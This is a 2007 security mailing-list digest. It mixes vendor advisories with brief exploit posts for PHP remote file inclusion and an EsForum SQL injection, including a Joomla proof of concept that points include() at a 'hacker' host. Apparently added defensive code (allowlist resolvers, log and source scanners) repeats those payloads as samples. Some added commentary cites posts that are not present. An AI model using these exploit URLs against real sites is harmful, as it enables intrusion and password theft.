e8aea2d0c9a45462ef30ab0113b62164  corporate/4.0/x86_64/lib64freeradius1-unixODBC-1.0.4-2.4.20060mlcs4.x86_64.rpm
0fb72186b61687df8dedff8d874fbb86  corporate/4.0/SRPMS/freeradius-1.0.4-2.4.20060mlcs4.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGLO1nmqjQ0CJFipgRAsFaAJ9co3OlDWZ/TbgBhXObcQQisfeV7wCglV83
4mS7Fi8Nr26rU13+J4dlRxM=
=UflY
-----END PGP SIGNATURE-----
FLEA-2007-0012-1: madwifi
Foresight Linux Essential Advisory: 2007-0012-1
Published: 2007-04-22
Rating: Moderate

Updated Versions:
    madwifi=/[EMAIL PROTECTED]:devel//fl:desktop//[EMAIL PROTECTED]:1-devel//1/0.9.3-0.0.0.1-1
    group-dist=/[EMAIL PROTECTED]:1-devel//1/1.2.1-0.2-1

References:
    https://issues.foresightlinux.org/browse/FL-263
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7177
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7178
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7179
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7180

Description:
Previous versions of the madwifi package were vulnerable to a number of Denial-of-Service issues, at least two of which can be exploited to cause a system crash (kernel oops). In addition, previous versions could be made to send unencrypted information before authentication finishes when using WPA, an information leak.
[ GLSA 200704-19 ] Blender: User-assisted remote execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200704-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Blender: User-assisted remote execution of arbitrary code
      Date: April 23, 2007
      Bugs: #168907
        ID: 200704-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability has been discovered in Blender allowing for user-assisted arbitrary code execution.

Background
==========

Blender is a 3D creation, animation and publishing program.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  media-gfx/blender       < 2.43                            >= 2.43

Description
===========

Stefan Cornelius of Secunia Research discovered an insecure use of the "eval()" function in kmz_ImportWithMesh.py.

Impact
======

A remote attacker could entice a user to open a specially crafted Blender file (.kmz or .kml), resulting in the execution of arbitrary Python code with the privileges of the user running Blender.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Blender users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-gfx/blender-2.43"

References
==========

  [ 1 ] CVE-2007-1253
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1253

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-19.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
Allfaclassfieds (level2.php dir) remote file inclusion
Allfaclassfieds (level2.php dir) remote file inclusion
--
Bug Found By Dr.RoVeR --> Arab48 Hacker
Contact: [EMAIL PROTECTED]
---
Script: allfaclassfieds
Download: http://scriptat.com/download.php?sid=718
--
Bug File: level2.php
Bug code in line 4: require("$dir/admin/dp.php");
--
Exploit: http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript]
--
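The four remote-file-include posts on this page (Post Revolution, c-arbre, acvsws and Allfaclassfieds above) share one root cause: a directory or file name that the request can influence is concatenated straight into include()/require(). The following is an added example, not code from any of those projects, showing the vulnerable shape next to a resolver that only accepts names from a fixed list and verifies the final path sits inside the intended directory. THEME_DIR, LANG_DIR, the allowlists and the file names are assumptions for the example; the Spanish file names are taken from the Post Revolution listing.

```php
<?php
// Added example (not code from Post Revolution, c-arbre, acvsws or Allfaclassfieds):
// choosing an include target from an allowlist instead of a request-controlled path.
declare(strict_types=1);

// Assumed layout: templates live under THEME_DIR, language files under LANG_DIR.
const THEME_DIR = __DIR__ . '/themes';
const LANG_DIR  = __DIR__ . '/language';

// Allowlists: the only template and language names the application ships.
const ALLOWED_TEMPLATES = ['default', 'classic'];
const ALLOWED_LANGS     = ['es', 'en'];
const THEME_FILES       = ['encabezado.php', 'cuerpo.php', 'pie.php', 'error.php'];

/**
 * Vulnerable shape from the advisories above, kept for contrast (do not use):
 * both the directory and the template name come from data the request can
 * influence, so the argument may be a URL or contain "../".
 */
function include_theme_file_unsafe(string $dir, string $template, string $file): void
{
    include $dir . 'themes/' . $template . '/' . $file; // attacker-controlled path
}

/**
 * Hardened: $name must be a listed directory name, $file a listed file name,
 * and the resolved path must still lie under $base after realpath() has
 * collapsed symlinks and ".." components.
 */
function resolve_under(string $base, string $name, array $allowedNames, string $file, array $allowedFiles): string
{
    if (!in_array($name, $allowedNames, true)) {
        throw new InvalidArgumentException('unknown name: ' . $name);
    }
    if (!in_array($file, $allowedFiles, true)) {
        throw new InvalidArgumentException('unknown file: ' . $file);
    }
    $realBase = realpath($base);
    $path     = realpath($base . '/' . $name . '/' . $file);
    if ($realBase === false || $path === false) {
        throw new RuntimeException('file not found: ' . $name . '/' . $file);
    }
    // Prefix check with the separator included, so "/themes-evil" is not accepted for "/themes".
    if (strpos($path, $realBase . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('resolved path escapes ' . $base);
    }
    return $path;
}

function resolve_theme_file(string $template, string $file): string
{
    return resolve_under(THEME_DIR, $template, ALLOWED_TEMPLATES, $file, THEME_FILES);
}

function resolve_lang_file(string $lang): string
{
    // Language files are named "<lang>.php" directly under LANG_DIR, so the
    // "directory" is LANG_DIR itself and the allowed file names are derived.
    $files = array_map(fn(string $l): string => $l . '.php', ALLOWED_LANGS);
    return resolve_under(dirname(LANG_DIR), basename(LANG_DIR), [basename(LANG_DIR)], $lang . '.php', $files);
}

// Demonstration with constructed inputs: a listed name is looked up on disk,
// anything not on the list is refused before any path is built.
foreach (['default', '../x', 'http://example.invalid/'] as $candidate) {
    try {
        echo resolve_theme_file($candidate, 'encabezado.php'), "\n";
    } catch (Exception $e) {
        echo "rejected '$candidate': ", $e->getMessage(), "\n";
    }
}
```

Two configuration settings back this up at the interpreter level: allow_url_include (Off by default) keeps include() from ever fetching an http:// or ftp:// path, and register_globals being Off stops a request parameter from silently becoming the $dir variable these scripts concatenate. The allowlist is still the real fix, because local file inclusion through "../" does not need either of those settings to be on.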
EsForum <= 3.0 SQL Injection Vulnerability
---
AYYILDIZ.ORG Presents...

Script: EsForum v3.0
Script Download: http://www.editeurscripts.com/scripts/dl-esforum-3.html
Contact: ilker Kandemir
Info: */ MEFISTO Begins. */
---
Exploit:

    forum.php?idsalon='/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/esforum_users%20where%20user_id=1/*

---
Tnx: H0tturk, Dr.Max Virus, Gencnesil, CodeR, Ajann
Special Tnx: AYYILDIZ.ORG
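The exploit URLs quoted for Allfaclassfieds (dir=) above and for EsForum (idsalon=) here are exactly what an access-log sweep should catch. As an added example that is not part of either post, the following Python scans Apache/nginx combined-format log lines and flags query parameters that carry a URL or PHP stream wrapper (remote file inclusion) or a UNION SELECT probe (SQL injection). The log format is assumed, and the sample lines, hosts and parameter names are constructed to mirror the posted payloads; they are not real traffic.

```python
"""Flag remote-file-inclusion and SQL-injection attempts in web access logs.

Added example, not code from any advisory in this digest. Assumes the
Apache/nginx "combined" log format. SAMPLE_LOG is constructed, not captured.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample log lines mirroring the posted exploit URLs (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [23/Apr/2007:10:01:02 +0000] "GET /admin/setup/level2.php?dir=http://203.0.113.9/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [23/Apr/2007:10:01:05 +0000] "GET /forum.php?idsalon='/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/esforum_users%20where%20user_id=1/* HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
198.51.100.4 - - [23/Apr/2007:10:02:00 +0000] "GET /forum.php?idsalon=12 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.4 - - [23/Apr/2007:10:02:30 +0000] "GET /index.php?template=default&lang=en HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Apr/2007:10:03:00 +0000] "GET /modules/rtmessageadd.php?_LIB_DIR=php://input HTTP/1.1" 500 0 "-" "curl/7.15"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# A value with one of these schemes makes PHP's include()/require() fetch
# code from elsewhere (allow_url_include) or from the request body (php://input).
RFI_SCHEME_RE = re.compile(r'^(?:https?|ftps?|php|data|expect|phar)://', re.IGNORECASE)

# UNION-based probe; the posted payload hides whitespace in /**/ comments.
SQLI_RE = re.compile(r"(?:'|\b)\s*union\s+(?:all\s+)?select\b")


def _normalize_sql(value):
    """Collapse inline comments and whitespace so /**/-obfuscated SQL reads plainly."""
    value = re.sub(r'/\*.*?\*/', ' ', value)
    value = re.sub(r'\s+', ' ', value)
    return value.lower()


def classify_param(name, value):
    """Return 'rfi', 'sqli' or None for one decoded query-parameter value."""
    if RFI_SCHEME_RE.match(value.strip()):
        return 'rfi'
    if SQLI_RE.search(_normalize_sql(value)):
        return 'sqli'
    return None


def scan_log(text):
    """Return a list of (client_ip, path, parameter, label) for suspicious parameters."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group('target'))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # parse_qsl already decoded once; decode again to catch double-encoding.
            label = classify_param(name, unquote_plus(value))
            if label:
                findings.append((m.group('ip'), parts.path, name, label))
    return findings


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print('%s %s param=%s %s' % hit)
```

Two of the three hits come from the same client a few seconds apart, which is the kind of grouping a rule should key on; the `template=default&lang=en` request is the legitimate shape of the Post Revolution `$config_data` values and is correctly left alone.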
Big Blue Guestbook HTML Injection Vulnerabilities
Hi friends,

Big Blue Guestbook software is prone to HTML injection attacks. This issue is exposed via the message form field in the guestbook entry submission form.

Exploitation could permit remote attackers to persistently inject hostile HTML and script code into guestbook content. This could allow for theft of cookie-based authentication credentials or other attacks, such as those which misrepresent guestbook content.

Vendor: http://www.ben-barnett.com/guestbook.php
Download: http://www.ben-barnett.com/BigBlueGuestbook.zip

Thnx: www.starhack.org // CaRaMeL
WASC-Articles: 'The business case for security frameworks'
The Web Application Security Consortium is proud to present 'The business case for security frameworks' by Robert Auger. In this article Robert describes the advantages of using input validation frameworks during development to reduce risks such as Cross-site Scripting.

This document can be found at http://www.webappsec.org/projects/articles/ .

- articles_at_webappsec.org
http://www.webappsec.org

Are you interested in writing a 'Guest Article' for the WASC? Additional information on article guidelines may be found at http://www.webappsec.org/articles/. Inquiries can be sent to articles_at_webappsec.org

"Contributed articles may include industry best practices, technical information about current issues, innovative defense techniques, etc. NO VENDOR PITCHES OR MARKETING GIMMICKS PLEASE. We are only soliciting concrete information from the experts on the front lines of the web application security field."

Join us on IRC: irc.freenode.net #webappsec
Re: WS_FTP Home 2007 NetscapeFTPHandler denial of service
Hey,

It appears that WS_FTP Professional 2007 is also vulnerable, as it takes advantage of NetscapeFTPHandler as well.
bibtex mase Remote File Inclusion
~~
bibtex mase Remote File Inclusion
~~
Affected Software ..: bibtex mase beta 2.0
Download ...........: http://www.cs.kuleuven.ac.be/~raf/bibtex/downloads/bibtex_mase_beta_2.0.tgz
Risk ...............: high
Found by ...........: InyeXion
Contact ............: InyeXion[at]gmail.com
Web ................: Www.InyeXion.com.ar
~~
Affected Files:

    /unavailable.php
    /Source.php
    /log.php
    /latex.php
    /indexinfo.php
    /index.php
    /importinfo.php
    /import.php
    /examplefile.php
    /clearinfo.php
    /clear.php
    /aboutinfo.php
    /about.php
    etc.

Vulnerable Code:

    include($bibtexrootrel."/layout/header.inc");

~~
Exploit:

    http://[target]/unavailable.php?bibtexrootrel=Shell?
    http://[target]/source.php?bibtexrootrel=Shell?
    http://[target]/log.php?bibtexrootrel=Shell?
    http://[target]/latex.php?bibtexrootrel=Shell?
    http://[target]/indexinfo.php?bibtexrootrel=Shell?
    http://[target]/index.php?bibtexrootrel=Shell?
    http://[target]/importinfo.php?bibtexrootrel=Shell?
    http://[target]/import.php?bibtexrootrel=Shell?
    http://[target]/examplefile.php?bibtexrootrel=Shell?
    http://[target]/clearinfo.php?bibtexrootrel=Shell?
    http://[target]/clear.php?bibtexrootrel=Shell?
    http://[target]/aboutinfo.php?bibtexrootrel=Shell?
    http://[target]/about.php?bibtexrootrel=Shell?

~~~
Fixed bug:

    if((isset($_REQUEST['bibtexrootrel']) || isset($_GET['bibtexrootrel']) || isset($_POST['bibtexrootrel'])) && !defined("bibtexrootrel")){
        die("denied access");
    }

~~
Remote file inclusion in Joomla 1.5.0 Beta
Hi,

Joomla! 1.5.0 is in Beta version and "should NOT be used for `live` or `production` sites." Joomla 1.0.12 has good security, but it seems that Joomla 1.5.0 doesn't have a good security approach.

Anyway, there is a remote file inclusion in Joomla 1.5.0 Beta:

File /libraries/pcl/pcltar.php, Line 74:

    if (!defined("PCLERROR_LIB")) {
        include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension);
    }

POC:

    http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/?

The original advisory (in Persian) is located at:
http://www.hackers.ir/advisories/joomla.html

- Omid
FLEA-2007-0013-1: xine-lib
Foresight Linux Essential Advisory: 2007-0013-1
Published: 2007-04-23
Rating: Moderate

Updated Versions:
    xine-lib=/[EMAIL PROTECTED]:devel//[EMAIL PROTECTED]:1-devel//1/1.1.6-1.1-1
    group-dist=/[EMAIL PROTECTED]:1-devel//1/1.2.1-0.2-2

References:
    https://issues.foresightlinux.org/browse/FL-266
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1246

Description:
Previous versions of the xine-lib package were vulnerable to a buffer overflow which could be exploited to execute arbitrary code on the target machine. This can be exploited by a remote user only in a locally-assisted fashion, by enticing the user to open a specially crafted file.
[ GLSA 200704-18 ] Courier-IMAP: Remote execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200704-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Courier-IMAP: Remote execution of arbitrary code
      Date: April 22, 2007
      Bugs: #168196
        ID: 200704-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability has been discovered in Courier-IMAP allowing for remote code execution with root privileges.

Background
==========

Courier-IMAP is an IMAP server which is part of the Courier mail system. It provides access only to maildirs.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  net-mail/courier-imap          < 4.0.6-r2              >= 4.0.6-r2

Description
===========

CJ Kucera has discovered that some Courier-IMAP scripts don't properly handle the XMAILDIR variable, allowing for shell command injection.

Impact
======

A remote attacker could send specially crafted login credentials to a Courier-IMAP server instance, possibly leading to remote code execution with root privileges.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Courier-IMAP users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-mail/courier-imap-4.0.6-r2"

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-18.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
File117 Remote File Inclusion
~
File117 Remote File Inclusion
~
Affected Software ..: File117
Download ...........: http://www.sinato.com/jmuffin/upload/file117.zip
Risk ...............: high
Found by ...........: InyeXion
Contact ............: InyeXion[at]gmail.com
Web ................: Www.InyeXion.com.ar
~
Affected File:

    /html/php/detail.php

Vulnerable Code:

~
Exploit:

    http://[target]/html/php/detail.php?relPath=[shell]?
    http://[target]/html/php/detail.php?folder=[shell]?

~
Fixed bug:

    if((isset($_REQUEST['relPath']) || isset($_GET['relPath']) || isset($_POST['relPath'])) && !defined("relPath")){
        die("denied access");
    }

AND

    if((isset($_REQUEST['folder']) || isset($_GET['folder']) || isset($_POST['folder'])) && !defined("folder")){
        die("denied access");
    }

~
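The posted "Fixed bug" aborts any request that names the injected variable. That closes the register_globals vector these InyeXion reports depend on (the same guard appears in the bibtex mase post above), but it guards the symptom, a request parameter called relPath or folder, rather than the root cause, an include path built from a variable the client can influence. As an added example that is not File117's code or the advisory author's, the Python below shows the allow-list pattern a practitioner would use instead: validate the component against a strict pattern, join it under a fixed root, canonicalise, and verify the result is still inside that root. The directory layout, file names and the IncludeRejected type are assumptions made for the demonstration.

```python
"""Allow-list resolution of a user-influenced include path.

Added example, not from File117 or any advisory in this digest. It models the
check that should sit in front of include()/require() when a client-supplied
value selects a template or folder. Paths and names below are assumptions.
"""
import os
import re
import tempfile

# A template/folder selector is an identifier, never a path or a URL.
SAFE_NAME_RE = re.compile(r'^[A-Za-z0-9_-]{1,64}$')


class IncludeRejected(ValueError):
    """Raised for any value that must not reach include()."""


def resolve_include(base_dir, user_value, filename):
    """Return the canonical path base_dir/<user_value>/<filename>, or raise.

    Rejects URLs and stream wrappers (no ':' or '/' survives SAFE_NAME_RE),
    traversal, and anything that, after symlink resolution, lands outside
    base_dir. Existence is checked last so the caller can include() directly.
    """
    if not SAFE_NAME_RE.match(user_value):
        raise IncludeRejected('bad component: %r' % user_value)
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, user_value, filename))
    # commonpath, not startswith: "/srv/themes-evil" must not pass for "/srv/themes".
    if os.path.commonpath([root, candidate]) != root:
        raise IncludeRejected('escapes base: %r' % candidate)
    if not os.path.isfile(candidate):
        raise IncludeRejected('no such include: %r' % candidate)
    return candidate


def demo():
    """Exercise resolve_include in a throwaway tree; return {label: outcome}."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        themes = os.path.join(tmp, 'themes')
        os.makedirs(os.path.join(themes, 'default'))
        with open(os.path.join(themes, 'default', 'header.inc'), 'w') as f:
            f.write('<!-- header -->')
        # A file outside the include root that an attacker would like to reach.
        with open(os.path.join(tmp, 'config.php'), 'w') as f:
            f.write('<?php $db_pass = "x";')
        # A symlink inside the tree that points back outside it.
        os.symlink(tmp, os.path.join(themes, 'link'))
        attempts = {                       # constructed inputs
            'default':   'default',
            'remote':    'http://203.0.113.9/shell.txt?',
            'wrapper':   'php://input',
            'traversal': '../',
            'symlink':   'link',
            'missing':   'nonexistent',
        }
        for label, value in attempts.items():
            try:
                resolve_include(themes, value, 'header.inc')
                results[label] = 'allowed'
            except IncludeRejected:
                results[label] = 'rejected'
    return results


if __name__ == '__main__':
    for label, outcome in demo().items():
        print('%-9s %s' % (label, outcome))
```

The symlink case is why the canonical-path check is kept even though the pattern check already rejects slashes and dots: a writable upload directory or an unpacked theme archive can place a link inside the tree that points anywhere on disk.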
[ GLSA 200704-16 ] Aircrack-ng: Remote execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200704-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Aircrack-ng: Remote execution of arbitrary code
      Date: April 22, 2007
      Bugs: #174340
        ID: 200704-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Aircrack-ng contains a buffer overflow that could lead to the remote execution of arbitrary code with root privileges.

Background
==========

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured.

Affected packages
=================

    -------------------------------------------------------------------
     Package                     /  Vulnerable  /            Unaffected
    -------------------------------------------------------------------
  1  net-wireless/aircrack-ng          < 0.7-r2                >= 0.7-r2

Description
===========

Jonathan So reported that the airodump-ng module does not correctly check the size of 802.11 authentication packets before copying them into a buffer.

Impact
======

A remote attacker could trigger a stack-based buffer overflow by sending a specially crafted 802.11 authentication packet to a user running airodump-ng with the -w (--write) option. This could lead to the remote execution of arbitrary code with the permissions of the user running airodump-ng, which is typically the root user.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Aircrack-ng users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-wireless/aircrack-ng-0.7-r2"

References
==========

  [ 1 ] CVE-2007-2057
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2057

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-16.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
claroline <= Multiple Remote File Include Vulnerability
# claroline <= Multiple Remote File Include Vulnerability
# D.Script: http://www.e-learningone.it/software_free/e-learning/claroline175.zip
# Discovered by: MoHaNdKo -=-=-> [EMAIL PROTECTED]
# Homepage: http://www.MoHaNdKo.cOm
# Exploit: [Path]/claroline/inc/lib/rootSys=Shell
# Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm
# Greetz To: mY Love Dr.hacker BiG seso
lms 1.5.3 Remote File Inclusion
~~
lms 1.5.3 Remote File Inclusion
~~
Affected Software ..: lms 1.5.3 libs
Download ...........: http://www.lms.org.pl/download/1.5/
Risk ...............: high
Found by ...........: InyeXion
Contact ............: InyeXion[at]gmail.com
Web ................: Www.InyeXion.com.ar
~~
Affected File:

    /modules/rtmessageadd.php

Vulnerable Code:

    Line 27: include($_LIB_DIR.'/multipart_mime_email.php');

~~
Exploit:

    http://[target]/modules/rtmessageadd.php?_LIB_DIR=Shell?

~~~
Fixed bug: Update to the latest version
~~
[ GLSA 200704-17 ] 3proxy: Buffer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200704-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: 3proxy: Buffer overflow
      Date: April 22, 2007
      Bugs: #174429
        ID: 200704-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability has been discovered in 3proxy allowing for the remote execution of arbitrary code.

Background
==========

3proxy is a multi-protocol proxy, including HTTP/HTTPS/FTP and SOCKS support.

Affected packages
=================

    -------------------------------------------------------------------
     Package                 /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  net-proxy/3proxy            < 0.5.3h                     >= 0.5.3h

Description
===========

The 3proxy development team reported a buffer overflow in the logurl() function when processing overly long requests.

Impact
======

A remote attacker could send a specially crafted transparent request to the proxy, resulting in the execution of arbitrary code with the privileges of the user running 3proxy.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All 3proxy users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-proxy/3proxy-0.5.3h"

References
==========

  [ 1 ] CVE-2007-2031
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2031

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-17.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
PHPMyBibli <= Multiple Remote File Include
# PHPMyBibli <= Multiple Remote File Include Vulnerability
# D.Script: http://phpmybibli.sourceforge.net/PhpMyBibli-nightbuild.tar.gz
# Discovered by: MoHaNdKo -=-=-> [EMAIL PROTECTED]
# Homepage: http://www.MoHaNdKo.cOm
# Exploit: [Path]/includes/init.inc.php?base_path=Shell
# Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm
# Greetz To: mY Love Dr.hacker BiG seso
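Every RFI report in this digest (Allfaclassfieds, bibtex mase, Joomla's pcltar.php, File117, lms, claroline, PHPMyBibli) reduces to the same grep: an include/require whose path begins with a variable, which is exploitable whenever that variable can be set by the client through register_globals or an unvalidated request parameter. As an added example that is not from any of these projects, the Python below performs that scan over a constructed set of PHP snippets mirroring the lines quoted in the advisories (the safe.php entry is invented to show non-hits), reporting the keyword, leading variable and line number. It is a lexical heuristic that assumes one statement per include call; it is meant for triage, not as a parser.

```python
"""Find include/require statements whose path starts with a variable.

Added example, not code from any project or advisory in this digest.
SAMPLE_SOURCES is constructed from the snippets quoted in the posts; it is not
the projects' real files. The scan is a lexical heuristic for triage only.
"""
import re

SAMPLE_SOURCES = {
    'level2.php': 'require("$dir/admin/dp.php");',
    'unavailable.php': 'include($bibtexrootrel."/layout/header.inc");',
    'pcltar.php': '''if (!defined("PCLERROR_LIB")) {
  include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension);
}''',
    'rtmessageadd.php': "include($_LIB_DIR.'/multipart_mime_email.php');",
    'common.php': 'include ($dir."themes/".$config_data["template"]."/encabezado.php");',
    # Invented counter-examples: literal prefix, constant path, __FILE__-anchored.
    'safe.php': '''include_once dirname(__FILE__) . "/lib/" . $name . ".php";
require_once("config.php");
$x = include "fixed/" . $part;''',
}

# include/require[_once], with or without parentheses, up to the statement end.
INCLUDE_RE = re.compile(
    r'\b(?P<kw>include_once|require_once|include|require)\b\s*\(?\s*'
    r'(?P<arg>[^;]*?)\s*\)?\s*;')

# Argument that starts with a variable: $dir, $_LIB_DIR, $cfg["template"],
# or a double-quoted string that interpolates one ("$dir/..."). Single-quoted
# strings do not interpolate in PHP, so '$dir' is a literal and is not flagged.
LEADING_VAR_RE = re.compile(
    r'^(?:\$(?P<var>[A-Za-z_]\w*)(?:\[[^\]]*\])*'
    r'|"\$(?P<var2>[A-Za-z_]\w*))')


def find_variable_includes(source):
    """Return [(keyword, variable, line_no)] for includes whose path begins with a variable."""
    hits = []
    for m in INCLUDE_RE.finditer(source):
        arg = m.group('arg').strip()
        v = LEADING_VAR_RE.match(arg)
        if not v:
            continue  # literal or function-anchored prefix: not an RFI sink
        var = v.group('var') or v.group('var2')
        line_no = source.count('\n', 0, m.start()) + 1
        hits.append((m.group('kw'), var, line_no))
    return hits


def scan(sources):
    """Run find_variable_includes over a {filename: source} mapping."""
    return {name: find_variable_includes(src) for name, src in sources.items()}


if __name__ == '__main__':
    for name, hits in scan(SAMPLE_SOURCES).items():
        for kw, var, line_no in hits:
            print('%s:%d: %s() path starts with $%s' % (name, line_no, kw, var))
```

A hit is only a candidate: the next step is to confirm that the variable is not assigned unconditionally before the include (a config.php that sets `$dir` and is loaded first closes the hole, a `defined()` guard around the include as in pcltar.php does not) and that the host runs with register_globals or passes the value through from the request.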
[Reversemode advisory] CheckPoint Zonelabs - ZoneAlarm SRESCAN driver local privilege escalation
CHECK POINT ZONE LABS PRODUCTS MULTIPLE LOCAL PRIVILEGE ESCALATION VULNERABILITIES

Rubén Santamarta <[EMAIL PROTECTED]>
04.20.2007

Affected products:
  + ZoneAlarm (Srescan.sys v 5.0.155 and earlier)

